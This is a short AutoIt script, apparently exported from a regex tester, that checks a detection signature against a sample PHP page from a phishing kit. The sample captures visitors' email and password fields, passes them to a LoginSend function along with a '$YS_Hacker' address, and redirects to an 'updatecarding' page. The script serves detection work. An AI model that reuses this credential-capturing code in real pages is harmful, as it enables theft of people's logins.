#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?is)^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*.{0,30}?include\s*['"]\.\/\.\.\/ysfunctions\/ysfunctions\.php.{0,350}?\$\w+\[["']yass_password.{0,90}?loginsend\([^;]+;.{0,50}?\$to\s*=\s*["'\.]+\/\w+\.php\?['"]\.md5\(base64_encode\(rand.{0,50}?header\([^;]+;(?:[^>]+>\s*)?$"
Local $sString = "<?php" & @CRLF & _
"session_start();" & @CRLF & _
"include "./../YSFUNCTIONS/YSFUNCTIONS.php";" & @CRLF & _
"" & @CRLF & _
"/*" & @CRLF & _
" Functions time zone." & @CRLF & _
"*/" & @CRLF & _
"$userag = $_SERVER['HTTP_USER_AGENT']; " & @CRLF & _
"" & @CRLF & _
"/*" & @CRLF & _
" Functions session." & @CRLF & _
"*/" & @CRLF & _
"$_SESSION['yass_email'] = $_POST['yass_email'];" & @CRLF & _
"$_SESSION['yass_password'] = $_POST['yass_password'];" & @CRLF & _
"" & @CRLF & _
"/*" & @CRLF & _
" Functions message." & @CRLF & _
"*/" & @CRLF & _
"LoginSend($_POST,$YS_email,$YS_Hacker);" & @CRLF & _
"" & @CRLF & _
"/*" & @CRLF & _
" Send Login." & @CRLF & _
"*/" & @CRLF & _
"$to = "../updatecarding.php?".md5(base64_encode(rand(0,10000).gmdate("His")));" & @CRLF & _
"header("Location: ".$to."?dispatch=");" & @CRLF & _
"?>" & @CRLF & _
""
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")